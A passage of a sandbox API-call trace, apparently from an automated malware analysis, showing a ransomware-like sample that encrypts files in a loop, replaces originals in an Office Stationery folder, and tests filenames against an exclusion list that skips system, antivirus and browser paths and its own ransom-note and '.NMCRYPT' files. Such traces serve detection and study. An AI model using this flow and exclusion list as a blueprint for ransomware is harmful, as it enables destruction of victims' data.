pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.953] GetLastError () returned 0x0 [0164.953] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.953] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.953] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.953] GetLastError () returned 0x0 [0164.953] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.954] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.954] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.954] GetLastError () returned 0x0 [0164.954] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.954] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.954] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.954] GetLastError () returned 0x0 [0164.954] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.954] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.954] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.954] GetLastError () returned 0x0 [0164.954] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.954] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0xe1, lpOverlapped=0x0) returned 1 [0164.954] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xe1, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0164.954] GetLastError () returned 0x0 [0164.954] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0164.954] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.954] WriteFile (in: hFile=0x6a4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg")) returned 0x20 [0164.954] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg", dwFileAttributes=0x20) returned 0 [0164.955] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg") returned 1 [0164.955] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg")) returned 0 [0164.955] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" [0164.955] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.955] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF7CD.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf7cd.tmp")) returned 0xf7cd [0165.007] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF7CD.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf7cd.tmp"), dwFlags=0x1) returned 0 [0165.007] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF7CD.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf7cd.tmp")) returned 1 [0165.007] CryptDestroyKey (hKey=0x9ad478) returned 1 [0165.007] wcslen (_String="OK") returned 0x2 [0165.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.007] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0165.007] CryptDestroyHash (hHash=0x9ad138) returned 1 [0165.007] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0165.008] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*NMCRYPT") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*Recovers your files.html") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.exe") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.dll") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.lnk") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.bat") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.ini") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.msi") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*.scf") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*pagefile.sys*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*NTUSER.DAT*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*AppData*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\winrar\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\java\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\windows\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\ESET\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\AVG\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\AVIRA\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*Atheros*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*Realtek*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*bootmgr*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*boot*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*boot*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*CONFIG.SYS*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*IO.SYS*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*MSDOS.SYS*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*NTDETECT.COM*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*ntldr*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*chrome*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*opera*") returned 0 [0165.008] PathMatchSpecW (pszFile="Roses.htm", pszSpec="*firefox*") returned 0 [0165.008] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Roses.htm", pszSpec="*") returned 1 [0165.008] strlen (_Str="NMoreira") returned 0x8 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.008] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.009] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.011] CryptGenRandom (in: 